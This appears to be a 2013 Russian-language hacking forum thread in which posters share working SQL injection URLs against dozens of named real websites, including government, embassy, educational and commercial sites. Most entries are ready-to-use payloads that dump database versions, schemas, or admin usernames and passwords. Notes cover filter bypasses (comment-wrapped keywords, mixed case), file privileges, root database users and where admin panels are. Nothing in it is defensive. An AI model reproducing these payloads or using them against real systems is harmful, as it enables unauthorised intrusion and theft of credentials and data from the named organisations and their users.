http://www.floatinglife.com/management.php?ID=-29+union+select+1,%28select%28@x%29from%28select%2 8@x:=0x00%29,%28select%28null%29from%28floatinglif e.utenti%29where%280x00%29in%28@x:=concat%28@x,0x3 c62723e,user,0x3a,pwd%29%29%29%29x%29,3,4+--+
Code:
http://www.teklat.lv/c.php?id=2&id2=75%27+union+select+1,2,3,4,5,%28select%28@x%29 from%28select%28@x:=0x00%29,%28select%28null%29fro m%28information_schema.columns%29where%28table_sch ema!=0x696e666f726d6174696f6e5f736368656d61%29and% 280x00%29in%28@x:=concat%28@x,0x3c62723e,table_sch ema,0x2e,table_name,0x3a,column_name%29%29%29%29x% 29,7,8,9,10+--+
Code:
http://www.dfki.de/lt/card.php?id=-94+union+select+1,version%28%29,3,4,5,6,7,8,9,10,1 1,12,13,14,15,1,61,7,18,19,20,21,22,23,24,25,26,27 ,28,29+--+
Версия: 4.0.21-Max
Code:
http://www.biprint.ru/index.php?area=soft&parent=-39+union+select+version%28%29+--+
Версия: 5.1.56-log (Стоит фильтр на вывод БД)
Code:
http://www.bionets.eu/index.php?area=-17+union+select+1,2,%28select%28@x%29from%28select %28@x:=0x00%29,%28select%28null%29from%28bionets.u sers%29where%280x00%29in%28@x:=concat%28@x,0x3c627 23e,username,0x3a,passwd%29%29%29%29x%29+--+
ФК "Химки"
Code:
http://www.fckhimki.ru/modules/content/index.php?current_id=-49+union+select+1,2,3,4,5,6,7,8,%28select%28@x%29f rom%28select%28@x:=0x00%29,%28select%28null%29from %28information_schema.columns%29where%28table_sche ma!=0x696e666f726d6174696f6e5f736368656d61%29and%2 80x00%29in%28@x:=concat%28@x,0x3c62723e,table_sche ma,0x2e,table_name,0x3a,column_name%29%29%29%29x%2 9,10,11,12,13+--+
РОСГИДРОМЕТ
Code:
http://caspianmonitoring.ru/index.php?id=-1+union+select+1,%28select%28@x%29from%28select%28 @x:=0x00%29,%28select%28null%29from%28information_ schema.columns%29where%28table_schema!=0x696e666f7 26d6174696f6e5f736368656d61%29and%280x00%29in%28@x :=concat%28@x,0x3c62723e,table_schema,0x2e,table_n ame,0x3a,column_name%29%29%29%29x%29,3,4,5,6,7,8+--+
5.0.96-community
Code:
http://www.violinlab.com/FAQ/index.php?id=1+/*!union*/+/*!select*/+1,2,version%28%29,4+--+
4.0.27-log
Code:
http://www.obruch.ru/index.php?id=8&n=77&r=6+union+select+1,2,3,4,version%28%29+--+
Code:
http://www.africasia.com/services/opinions/opinions.php?ID=-2822%20union%20select%201,2,concat_ws(0x3a,version (),user(),database(),0x4861636b6564206279205365706 f),4,5,6,7,8,9,10--
Code:
http://www.sourceisrael.com/read.php?id=-104+union+select+1,group_concat(concat_ws(0x3a,ver sion(),user(),database(),0x4861636b656420627920536 5706f)),3,4,5,6,7,8,9,10,11+--+
Code:
http://www.lapedale.fr/pages/produit.php?id=-1133+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,concat_ ws(0x3a,version(),user(),database(),0x4861636b6564 206279205365706f),12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43,44,45,46,47,48,49,50,51--
Code:
http://www.wf-baits[dot]com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&cmd=add&cid=20&sid=0.6886686905513422&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5 ,6,7,8,CONCAT_ws(CHAR(32,58,32),user(),version(),d atabase()),10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,5 6,57,58,59,60,61,62,63%23
Tyc 610 Pr 1
Unknowhacker
06.09.2013, 00:35
ПриватБанк Авто
Code:
http://privat-auto.info/index.php?region=-1+union+select+%28select%28@x%29from%28select%28@x :=0x00%29,%28select%28null%29from%28information_sc hema.columns%29where%28table_schema!=0x696e666f726 d6174696f6e5f736368656d61%29and%280x00%29in%28@x:= concat%28@x,0x3c62723e,table_schema,0x2e,table_nam e,0x3a,column_name%29%29%29%29x%29+--+
См. исходный код 7 строку.
Pyramid CAr
Code:
http://www.pyravastuconsultant.in/pyramid-car.php?id=1+union+select+1,2,3,4,5,6,%28select%28 @x%29from%28select%28@x:=0x00%29,%28select%28null% 29from%28pyravast_pyravast.user_m%29where%280x00%2 9in%28@x:=concat%28@x,0x3c62723e,user_name,0x3a,pa ssword%29%29%29%29x%29+--+
Авто в аренду
Code:
http://www.elitetrans.com.ua/car.php?show=category&id=-6+union+select+1,2,3,4,%28select%28@x%29from%28sel ect%28@x:=0x00%29,%28select%28null%29from%28inform ation_schema.columns%29where%28table_schema!=0x696 e666f726d6174696f6e5f736368656d61%29and%280x00%29i n%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,t able_name,0x3a,column_name%29%29%29%29x%29,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20+--+
Греко-католики
Code:
http://www.mgce.uz.ua/category.php?id=14+union+/*!select*/+1,%28select%28@x%29from%28select%28@x:=0x00%29,%2 8select%28null%29from%28information_schema.columns %29where%28table_schema!=0x696e666f726d6174696f6e5 f736368656d61%29and%280x00%29in%28@x:=concat%28@x, 0x3c62723e,table_schema,0x2e,table_name,0x3a,colum n_name%29%29%29%29x%29,3+--+
Ювелирсервис
Code:
http://www.js.dn.ua/item.php?id=6&ref_item=133%27and%28select*from%28select%28name_c onst%28version%28%29,1%29%29,name_const%28version% 28%29,1%29%29a%29and%27/
5.1.61
=========================================
ELKOPLAST
Code:
http://elkoplast.ua/pro.php?id=30%27and%28select*from%28select%28name_ const%28version%28%29,1%29%29,name_const%28version %28%29,1%29%29a%29and%27
Версия:5.5.31
БукВица
Code:
http://www.bookvica.com.ua/shop.php?id=300+union+select+1,%28select%28@x%29fr om%28select%28@x:=0x00%29,%28select%28null%29from% 28bookvica_bookvica.users%29where%280x00%29in%28@x :=concat%28@x,0x3c62723e,login,0x3a,pass%29%29%29% 29x%29,3,4,5,6,7,8,9,10,11,12,13+--+
http://
www.planetfengshui.in
/love.php?id=9&cat_id=9+and+1=2+union+select+1,concat(unhex(hex(u ser())),0x3a,unhex(hex(database())),0x3a,unhex(hex (version()))),3,4,5,6 --+
===========================================
http://
www.accu-split.com
/event-details.html?id=-31'+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13 --+
===========================================
Unknowhacker
06.09.2013, 21:11
Comedy Club Kuban STYLE - как я их ненавижу, если честно!
Code:
http://comedykuban.ru/news.php?news_id=-17%27+union+select+1,0x472e4d61727469726f7379616e2 02d20332c313464617220436f204c74642e,3,4+--+
Версия: 5.5.30-30.2-log
=============================================
Интернет-магазин ТехноСектор
Code:
http://www.tes-ua.com/catalog.php?cat_id=29&brend=-180%29+union+select+1,2,3,4,5,6,7,8,%28select%28@x %29from%28select%28@x:=0x00%29,%28select%28null%29 from%28information_schema.columns%29where%28table_ schema!=0x696e666f726d6174696f6e5f736368656d61%29a nd%280x00%29in%28@x:=concat%28@x,0x3c62723e,table_ schema,0x2e,table_name,0x3a,column_name%29%29%29%2 9x%29+--+
Code:
http://www.mtosmt.org/mto-announce.php?id=-120+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,0x4861636b6564206279205365706f,5--
Code:
http://www.nau.in/announce.php?id=-595+union+select+1,0x4861636b6564206279205365706f, concat_ws(0x3a,version(),user(),database()),4,5,6, 7,8,9,10--
Code:
http://www.bjp-bg.com/paper.php?id=-5%20union%20select%201,2,3,4,@@version,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37--
Unknowhacker
08.09.2013, 11:22
Фотограф Andre Arment
Code:
http://www.andrearment.com/cat.php?id=-3'+union+select+1,2,3,(select(@x)from(select(@x:=0 x00),(select(null)from(andrearm_db.members)where(0 x00)in(@x:=concat(@x,0x3c62723e,username,0x3a,pass word%29%29%29%29x%29,5+--+
NOTE: См. исходный код 67 строка.
===============================================
Салон Аудио-Видео Триумфальная Арка
Code:
http://www.arka-hitech.com.ua/cat.php?id=-7+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18+--+
4.1.25-log
===============================================
Официальный сайт Харькова
Code:
http://www.kharkov.ua/internet.php3?categ=-25+union+select+1,2,%28select%28@x%29from%28select %28@x:=0x00%29,%28select%28null%29from%28khadm.cli ents%29where%280x00%29in%28@x:=concat%28@x,0x3c627 23e,email,0x3a,clientusername,0x3a,clientpassword% 29%29%29%29x%29,4,5,6,7,8+--+
BrilliantStudents.com
Code:
www.brilliantstudent.in/games.php?id=-2+union+/*!select*/+1,2,/*!table_name*/,4,5,6,7+/*!from*/+/*!information_schema.tables*/+/*!limit*/+4,20+--+
Note:Не смог вывести данные из таблицы bs-admin
Dracodes - GAMES или фильтр "грубой очистки".
Code:
http://www.dracoders.com/games.php?id=-7+/*!union*/+select+1,2,3,4,%28select%28@x%29from%28select%28@ x:=0x00%29,%28select%28null%29from%28Sql286973_1.j os_users%29where%280x00%29in%28@x:=concat%28@x,0x3 c62723e,username,0x3a,password%29%29%29%29x%29+--+
Marim.IT
Code:
http://www.marim.it/games.php?id=494%20and%20%281,1%29%3E%28select%20c ount%28*%29,concat%28%28select%20version%28%29%20% 29,0x3a,floor%28rand%28%29*2%29%29%20x%20from%20%2 8select%201%20union%20select%202%29%20a%20group%20 by%20x%20limit%201%29%23
Версия: 5.0.51a-24+lenny4:0
AutoDiv
Code:
http://autodiv.rs/auto.php?id=1187%27+union+select+1,2,3,version%28% 29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27+--+
Версия:5.1.53
JobMan.Ru
Code:
http://www.jobman.ru/html/doc.php?id=30+union+select+1,2,3,%28select%28@x%29 from%28select%28@x:=0x00%29,%28select%28null%29fro m%28information_schema.columns%29where%28table_sch ema!=0x696e666f726d6174696f6e5f736368656d61%29and% 280x00%29in%28@x:=concat%28@x,0x3c62723e,table_sch ema,0x2e,table_name,0x3a,column_name%29%29%29%29x% 29+--+
Novikovi.info
Code:
http://novikovi.info/man.php?id=-73+union+select+%28select%28@x%29from%28select%28@ x:=0x00%29,%28select%28null%29from%28information_s chema.columns%29where%28table_schema!=0x696e666f72 6d6174696f6e5f736368656d61%29and%280x00%29in%28@x: =concat%28@x,0x3c62723e,table_schema,0x2e,table_na me,0x3a,column_name%29%29%29%29x%29,2,3,4,5+--+
ЛАСМЕТ - Лаборатория специальной металлургии!
Code:
http://www.lasmet.ru/steel/mark.php?s=-50+union+select+1,%28select%28@x%29from%28select%2 8@x:=0x00%29,%28select%28null%29from%28lasmet18_db 2.admin%29where%280x00%29in%28@x:=concat%28@x,0x3c 62723e,login,0x3a,passwd%29%29%29%29x%29,3,4,5,6,7 ,8,9,10,11,12,13,14,15+--+
:: fmaurer ::
Code:
http://www.fmaurer.com/index.php?category_id=-5+union+select+1,2,3,4,5,6,7,version%28%29,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
Версия: 5.0.51a-24+lenny5
Маршрутизаторы Axesstel
Code:
http://www.axesstel.com/index.php?section=product&subsection=product_category&category_id=15+aND+1=0+UNION+SELECT+1,2,VERSION%28 %29,4,5,6,7,8,9,10+--+
Версия: 4.1.22-standard-log
ЭКОМ - Общественное обсуждение градостроительных объектов
Code:
http://ecom.su/city_building/index.php?id=-21+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,%28s elect%28@x%29from%28select%28@x:=0x00%29,%28select %28null%29from%28information_schema.columns%29wher e%28table_schema!=0x696e666f726d6174696f6e5f736368 656d61%29and%280x00%29in%28@x:=concat%28@x,0x3c627 23e,table_schema,0x2e,table_name,0x3a,column_name% 29%29%29%29x%29,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35+--+
P.S Не забываем убирать пробелы!
Code:
http://www.sostrader.it/sostrader/didattica1.cfm?id=2+and+1=0+union+all+select+1,2,@ @version/*
UP
http://
www.remassociates.co.uk
/jobs.php?id=34'+union+select+1,@@version,3,4,5,6,7 ,8,9,10,11,12,13+--+
===============================================
pr=1
http://
www.torson.be
/jobs.php?id=8+and +1=2+union+select+1,2,version(),4+--+
===============================================
pr=3
http://
careers.cngroup.co.uk
/job.php?id=6'+and+(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)+--+
===============================================
pr=3
http://
www.navagaprom.com
/oldsite/job.php?id=-96+union+select+1,version(),3,4+--+&db=job
===============================================
http://
www.cornerjob.co.za
/view-job.php?id=678 and if(mid(version(),1,1)=5,sleep(5),0)
===============================================
pr=6
http://
www.niot.res.in
/recruit/cv/job.php?id=-106+union+select+concat_ws(0x3a,user,password,file _priv),2,3 from mysql.user+--+
===============================================
pr=3
http://
www.tedrecruitment.com
/job.php?id=8263'+and+row(1,1)>(select+count(*),concat((select +table_name from information_schema.tables where table_schema=database() limit 11,1),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x ) and '1'='1
===============================================
тиц = 300
http://
www.artantique.ru/brand-item.phtml?id=15+union+select+1,concat_ws(':',user (),version(),database()),3,4,5,6+--+
File_priv = Y
Code:
http://www.toddjobs.com/job.php?ID=-97+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database(),0x4861636b6564206279205365706f) ,7,8,9,10,11,12,13,14--
pr=3
http://
www.hassalls.com.au
/auction.php?id=405+and(select 1 from(select count(*),concat((select concat(username,0x3a,password) from cmsc_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)+--+
===============================================
country.ua
14к траффик
http://www.country.ua/message_send.php?to_user=4726/**/union/**/select/**/concat_ws(':',user(),version(),database()),2/**/--+
PS нужно авторизоваться
PSS хз где админка)
ej.ru
PHP:
http://ej.ru/articles/?a=24&id=17+or+1+group+by+concat%28%28select+version%28% 29%29,0x00,floor%28rand%280%29*2%29%29having+min%2 80%29+or+1--+
CY:4700||PR:5
25к траффа, пароли в бд есть, где админка хз))
тиц 190
http://www.kino-ukraina.com.ua/showwait.php?wait_id=271+union+select+1,2,user(),v ersion()+--+
root@localhost
http://
www.distrilog.be
/pages/en/jobs.php?dis=detail&ID=-43'+union+select+1,2,3,concat_ws(0x3a,username,pas sword),5,6,7,8,9 from users limit 0,1+--+
===============================================
http://murtet.ru/index.php?page=-norders'+union+select+version()+--+
http://
www.poniem.co.uk
/products/model.php?id=-14+union+select+1,2,version(),4,5,6,7,8,9 +--+
===============================================
http://
www.hiredhandsmodels.com
/model.php?id=24+and+(substring(version(),1,1)=4)+--+
===============================================
psihoz26
23.09.2013, 17:24
Code:
http://addcs.vpn.by/view.php?bg=3C3A36&text=9a9a9a&link=ffffff&ip=ffffff&m=1&id=-800+union+select+1,2,3,4,admin_name,admin_pass,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20+from+csmon.amx _admin+limit+0,1+--+
почемуто не грузится с словом concat в запросе
хавиж и sqlmap не хотят дампить
пришлось руками крутить =(
Unknowhacker
24.09.2013, 12:26
Big Криуз (фильтр на вывод данных)
Code:
http://www.bigcruise.ru/company/?id=-40%27+union+select+1,2,version(),4,5,6+--+
Версия: 5.1.70-log
Строймат
Code:
http://www.stroymat.net/index.php?sectID=-6+union+select+1,2,3,%28select%28@x%29from%28selec t%28@x:=0x00%29,%28select%28null%29from%28informat ion_schema.columns%29where%28table_schema!=0x696e6 66f726d6174696f6e5f736368656d61%29and%280x00%29in% 28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name%29%29%29%29x%29,5,6,7,8+--+
Магазин пиломатериалов (имеет много баз)
Code:
http://wood-group.ru/index.php?sectID=-179+union+select+1,2,3,4,5,6,7,%28select%28@x%29fr om%28select%28@x:=0x00%29,%28select%28null%29from% 28information_schema.columns%29where%28table_schem a!=0x696e666f726d6174696f6e5f736368656d61%29and%28 0x00%29in%28@x:=concat%28@x,0x3c62723e,table_schem a,0x2e,table_name,0x3a,column_name%29%29%29%29x%29 ,9+--+
OPMPlus Москва
Code:
http://www.opmplus.ru/index.php?gID=-165+union+select+1,2,3,4,version%28%29,6,7,8,9+--+§ID=6
Версия: 5.1.52-log
DD2DDS (не могу обойти фильтр )
Code:
http://www.dds2dds.com/index.php?sect_id=12&site_num=1%27+union+select+1,2,3,4,5+--+
SALE.KHARKOV.UA
Code:
http://www.sale.kharkov.ua/advinfo.php?postid=146+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,version%28%29 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
Версия: 5.0.91-log (базу не смогу вытянуть из-за фильтрации)
БЛОК-ХАУС
Code:
http://www.blok-haus.ru/index.php?sectID=-1+union+select+1,version%28%29+--+
Версия: 5.1.52-log
Администрация Ейского Района
Code:
http://rayon.yeisk.su/trades/index.php?p_id=-466+union+select+1,2,3,4,%28select%28@x%29from%28s elect%28@x:=0x00%29,%28select%28null%29from%28info rmation_schema.columns%29where%28table_schema!=0x6 96e666f726d6174696f6e5f736368656d61%29and%280x00%2 9in%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e ,table_name,0x3a,column_name%29%29%29%29x%29,6,7+--+
Lion-Expo.Ru
Code:
http://lion-expo.ru/index.php?sectID=781+union+select+1,version%28%29, 3,4,5,6,7,8+--+
Версия: 5.5.33-cll-lve
ОАО "Стеклозавод" "НЕМАН" или как разбить все стёкла.
Code:
http://www.neman.by/ru/index.php?section_id=-125+union+select+%28select%28@x%29from%28select%28 @x:=0x00%29,%28select%28null%29from%28information_ schema.columns%29where%28table_schema!=0x696e666f7 26d6174696f6e5f736368656d61%29and%280x00%29in%28@x :=concat%28@x,0x3c62723e,table_schema,0x2e,table_n ame,0x3a,column_name%29%29%29%29x%29+--+
Unknowhacker said:
Big Криуз (фильтр на вывод данных)
Code:
http://www.bigcruise.ru/company/?id=-40%27+union+select+1,2,version(),4,5,6+--+
Версия:
5.1.70-log
Фильтр не "на вывод данных" - фильтр на from. То есть FROM, fRoMи т.д. не фильтруются.
www.bigcruise.ru/company/?id=-40'+union select+1,2,table_name,4,5,6+FROM+information_schem a.tables+where table_schema=database()+limit 0,1+--+
а вот и первая табдица: admins
Unknowhacker
25.09.2013, 18:45
Code:
http://www.kenwright.com/index.php?id=-1265+union+select+1,2,version%28%29,4,5,6,7,8,9,10 +--+
Версия:5.0.95-log
[COLOR="Olive"]Wri GROUP
Code:
http://wrigroup.ca/index.php?catid=-148+union+select+%28select%28@x%29from%28select%28 @x:=0x00%29,%28select%28null%29from%28wrigroup_wri group.cfaq_admin%29where%280x00%29in%28@x:=concat% 28@x,0x3c62723e,username,0x3a,password%29%29%29%29 x%29,2+--+
===============================
Steam Whistle Brewing
Code:
https://shop.steamwhistle.ca/index.php?CatID=25+union+/*!select*/+1,2,3,version%28%29,5,6,7,8,9,10,11,12,13,14+--+
Версия: 5.0.96-community
===============================
Code:
http://www.thecis.ca/index.php?catID=40&itemID=-63+union+select+1,2,%28select%28@x%29from%28select %28@x:=0x00%29,%28select%28null%29from%28cistudies .cisUsers%29where%280x00%29in%28@x:=concat%28@x,0x 3c62723e,userName,0x3a,userPasswd%29%29%29%29x%29, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23+--+
См. title или исходный код 6-я строка
===============================
Code:
http://dogbg.net/index.php?catid=-18+union+/*!select*/+1,version%28%29+--+
Версия: 5.1.70-cll
==============================
HevyMetal.com любителям тяжёлой музыки все сюда
Code:
https://www.heavymetal.com/index.php?id=-1946+union+/*!select*/+1,2,3,4,5,6,version%28%29,8,9,10,11,12+--+
Версия: 5.0.96-community
=========================
эКОМ
Code:
http://ecom.su/news/index.php?id=-1232+union+select+1,2,3,4,5,6,7,%28select%28@x%29f rom%28select%28@x:=0x00%29,%28select%28null%29from %28information_schema.columns%29where%28table_sche ma!=0x696e666f726d6174696f6e5f736368656d61%29and%2 80x00%29in%28@x:=concat%28@x,0x3c62723e,table_sche ma,0x2e,table_name,0x3a,column_name%29%29%29%29x%2 9,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35+--+
юридическая помощь Московская коллегия адвокатов
Code:
http://www.trunov.com/content.php?act=showcat&id=-357+union+select+%28select%28@x%29from%28select%28 @x:=0x00%29,%28select%28null%29from%28information_ schema.columns%29where%28table_schema!=0x696e666f7 26d6174696f6e5f736368656d61%29and%280x00%29in%28@x :=concat%28@x,0x3c62723e,table_schema,0x2e,table_n ame,0x3a,column_name%29%29%29%29x%29,2+--+
см. TITLE
УКР Пром
http://www.ukr-prom.com/firm-100+and+1>(ORD(substr(database(),1,1))<>0x7A)/
@@basedir - 5: /usr/
user() - 14: zmey@localhost
database() - 16: zmey_ukrprom_new
version() - 10: 5.0.77-log
Unknowhacker
26.09.2013, 19:39
Центр Юридической Помощи
Code:
http://arbitrsud.com/index.php?mat=-12+union+select+1,2,3,version%28%29,5,6,7,8,9,10,1 1,12+--+
Версия: 5.1.70-log BLIND
Фильтр пропускает FrOm
http://www.wtech.ru/images/logo.gif
http://www.wtech.ru/?page=market&razd=-5%20and%201=2%20union%20select%201,concat_ws(0x3a, @@version,user(),database()),3,4,5--
5.1.68-cll wtech_wtech@localhost wtech_vt
DezMond™
28.09.2013, 12:45
https://koki-es.de/shop_index.php?action=progr_detail¶m=detail&id=-680+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43+--+
Unknowhacker
28.09.2013, 19:09
Уральский Авто аукцион
Code:
http://www.uralaa.ru/moto.php?id=-317%27+union+select+1,2,3,4,5,6,7,version%28%29,9, user%28%29,database%28%29,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 ,37,38,39,40,41,42+--+
Версия: 5.0.96-community
Пользователь: uralaa_uralaa@localhost
БД: uralaa_uralaaru
Mistoveloce.It Итальянский сайт спортивных мотоциклов
Code:
http://mistoveloce.it/moto.php?id=488%27+union+select+1,%28select%28@x%2 9from%28select%28@x:=0x00%29,%28select%28null%29fr om%28mistodb.users%29where%280x00%29in%28@x:=conca t%28@x,0x3c62723e,username,0x3a,password%29%29%29% 29x%29,3,4,5,6,7,8,9,10,11,12+--+
Итальянские скутеры, мопеды
Code:
http://www.autoexclusive.it/fra/moto.php?id=-23+union+select+1,2,3,4,5,6,7,version%28%29,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29+--+
Версия: 5.0.92-enterprise-gpl-log (Есть фильтр на вывод данных)
Code:
Cuir JB | Moto
http://www.cuir-mode-jb.com/moto.php?id=2+order+by+7+--+
JPLand
Code:
http://jpland.ru/mototehnika.php?id=160%27+UNION+SELECT+user%28%29, 2,3,4,version%28%29,6,7,8,9,10+--+
Версия: 4.1.22-log
Honda Aphla (Мотоциклы Хонда) официальный сайт
Code:
http://www.hondaalpina.com.br/moto.php?id=3911/**//*!uNiOn*//**//*!SELECT*/1/*!,*/2/*!,*/version%28%29/*!,*/4/*!,*/5/*!,*/6/*!,*/7/*!,*/8/*!,*/9/*!,*/10/*!,*/11/*!,*/12/*!,*/13/*!,*/14/*!,*/15/*!,*/16/*!,*/17/*!,*/18/*!,*/19/*!,*/20/*!,*/21/*!,*/22+--+
Версия: 5.1.70-cll
BLurpi^_^
29.09.2013, 08:19
http://profmagazin.ru/index.php?cPath=274+UNION+SELECT+version%28%29,2+--+
вывод справа в корзине
Code:
http://www.futuresfins.com/fin-detail.php?id=-173+union+select+concat_ws(0x3a,version(),user(),d atabase()),2,3,4,5,6,7,8,9,10,11--
Code:
олимп-омск.рф/catalog.php?cid=-47+union+select+1,version(),3,4,5,6,7,8,9,10,11,us er(),database()+--+
www.kinoteatrdoc.ru/press.php?id=-59+union+select+user(),databas(),version()+--+
sedimental.com/catalog/index.php?ID=-59'+UNION+SELECT+1,database(),user(),version(),5,6 ,7,8,9,10,11,12,13,14,15,16,17+--+
www.krasarossii.ru/blocks/2012-kr.php?id=-59+union+select+1,55,user(),4,database(),6,version (),8,9+--+
WallHack
30.09.2013, 12:46
Система активной рекламы !
http://novabux.ru/news.php?id=0%27+union+select+1,group_concat(0x03a ,column_name),3,4+from+information_schema.columns+ where+table_name=0x74625F7573657273+--+
И сайт Философской антропологии
http://encycl.anthropology.ru/article.php/?id=1+union+select+1,@@version,3,4,5,6,7,8,9,10+--
http://
www.intelpre.com
/site/album/ds.php?id=3
'+union -- %0A%0Dselect*fRom(select 1)a1 join(select 2)a2 join(select version())a3 join(select 4)a4 join(select 5)a5 join(select 6)a6+--+
==============================================
Улыбайся
01.10.2013, 00:05
Депутат Совета депутатов муниципального образования Оренбургский район
http://vakalinin.ru/index.php?name=news&id=-23%27+union+select+1,2,database%28%29,@@version,5, 6,7+--+
АДМИНИСТРАЦИЯ МУНИЦИПАЛЬНОГО ОБРАЗОВАНИЯ
ПРИГОРОДНЫЙ СЕЛЬСОВЕТ ОРЕНБУРГСКОГО РАЙОНА ОРЕНБУРГСКОЙ ОБЛАСТИ
Code:
http://moprigorod.ru/news.php?id=-49'+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5+--+
Unknowhacker
01.10.2013, 19:20
Американское Сообщество Международного Законодательства
Code:
http://www.eisil.org/index.php?t=sub_pages&cat=-185+union+Select+1,2,3,4,version%28%29,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21+--+
Версия: 5.0.77
Note: При запросе вывода данных браузер виснет.
===========================================
Mo-Ranch Conference Center
Code:
http://www.moranch.com/index.php?t=-6+union+select+%28select%28@x%29from%28select%28@x :=0x00%29,%28select%28null%29from%28information_sc hema.columns%29where%28table_schema!=0x696e666f726 d6174696f6e5f736368656d61%29and%280x00%29in%28@x:= concat%28@x,0x3c62723e,table_schema,0x2e,table_nam e,0x3a,column_name%29%29%29%29x%29+--+
EDU
Code:
http://www.mes.edu.eg/newsletter_archive.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),0x4861636b6564206279205365706f,4,5--
Unknowhacker
02.10.2013, 16:15
Европейский Центр Защиты Прав Человека
Code:
http://ehracmos.memo.ru/page.php?page=-14%27+union+select+1,2,%28select%28@x%29from%28sel ect%28@x:=0x00%29,%28select%28null%29from%28u36634 4.writers%29where%280x00%29in%28@x:=concat%28@x,0x 3c62723e,username,0x3a,password%29%29%29%29x%29,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34+--+
NOTE: Вся правда здесь -)
Code:
http://azembassy.pl/pl/index.php?section=-11+/**/union/**/+/**/select/**/+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user(),d atabase()),10,11,12,13,14+--+
Code:
5.5.33:azembassy_hotcom@hotcom.pl:azembassy_hotcom
http://
www2.mikipulley.co.jp
/en/product/model.php?id=pcbts&code=-001'+union+select+1,2,3,version(),5+--+
==============================================
pr=4
http://
www.ccmht.org
/dev/auction.php?id=1+union+select+version(),2,3,4,5,6, 7,8,9,10,11,12,13,14+--+
==============================================
http://
www.webandy.hekko.pl
/shimano/model.php?id=765+union+select+version(),2,3,4,5,6, 7,8,9+--+
==============================================
http://
www.dropdeadglamour.co.uk
/model.php?id=33+and+row(1,1)>(select+count(*),concat((select +version()),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x )
==============================================
тиц=10 pr=5
http://
www.ecam.es
/formacion/master.php?id=53'+union+select+1,2,3,(select(@x)fr om(select (@x:=0x00),(select(0)from(db1373047_ecam.profesora do)where(0x00)in(@x:=concat(@x,0x3c62723e,0x3a,usu ario,0x3a,pass))))antichat),5,6,7,8,9,10,11,12,13, 14,15,16,17+--+
==============================================
pr=4
http://
www.iundia.es
/iundia-master/master.php?id=2+and+1=2+/*!union*/+select+1,2,3,(select(@x)from(select (@x:=0x00),(select(0)from(qhb674.cms_administrador es)where(0x00)in(@x:=concat(@x,0x3c62723e,usr_admi n,0x3a,clave_admin))))antichat)+--+
==============================================
pr=7
http://
www.placement-uk.com
/ops/job.php?id=-1188'+union+select+1,2,concat(user,0x3a,pass),4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31 from admin limit 0,1+--+
==============================================
Сирийская таможенная служба
Code:
http://www.customs.gov.sy/Tariff.php?sid=-01+union+selecT+1,2,3,concat_ws(0x3a,version(),use r(),database(),0x4861636b6564206279205365706f),5,6 ,7--
novostivl.ru
PHP:
http://novostivl.ru/chat/view.php?id=3+or+1+group+by+concat((select+0x76657 273696f6e73716c),0x00,floor(rand(0)*2))having+min( 0)+or+1--+
db 5 version
CY:2300||PR:5
==================================================
Unknowhacker
04.10.2013, 18:59
Футбольная Лига
Code:
http://pfl.ua/articles/?rart=1275979382+order+by+2+--+
mid-day.com
http://www.mid-day.com/anniversary/maximum-city/article.php?id=43-999.9+union+select+1,2,3,4,5,6,7,8--
PR 3
ТИЦ 80
Alexa 6k
Code:
http://www.carhs.de/en/training/seminar_functions.php?sem_code=-2045'+union+select+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26--+
Unknowhacker
10.10.2013, 12:31
Помощь Морякам
Code:
http://crew-help.com.ua/study_out.php?id=-4+union+select+1,2,3,%28select%28@x%29from%28selec t%28@x:=0x00%29,%28select%28null%29from%28informat ion_schema.columns%29where%28table_schema!=0x696e6 66f726d6174696f6e5f736368656d61%29and%280x00%29in% 28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name%29%29%29%29x%29+--+
